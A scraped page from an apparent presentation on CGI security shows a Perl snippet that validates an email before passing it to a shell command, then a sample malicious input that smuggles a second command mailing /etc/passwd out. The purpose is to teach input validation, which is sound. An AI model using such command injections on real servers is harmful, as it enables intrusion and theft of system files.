Server Technology PPNT User Manual Page 21

  • Download
  • Add to my manuals
  • Print
  • Page
    / 95
  • Table of contents
  • BOOKMARKS
  • Rated. / 5. Based on customer reviews
Page view 20
CGI Security
Check parameters carefully!!!
if($email =~ /[^a-zA-Z0-9_\-\.@]/){
$_ = "The email address should be of
the form <i>user\@server</i>!";
}else{
$_ = qx($finger $email);
}
Suppose this e-mail address:
something ; mail [email protected] < /etc/passwd
Basically you let other people start programs on the server
Check what they want to do on your server!!!
Not only CGI! (PHP, Java Servlets, etc.)
(21/95)
Page view 20
1 2 ... 16 17 18 19 20 21 22 23 24 25 26 ... 94 95

Comments to this Manuals

No comments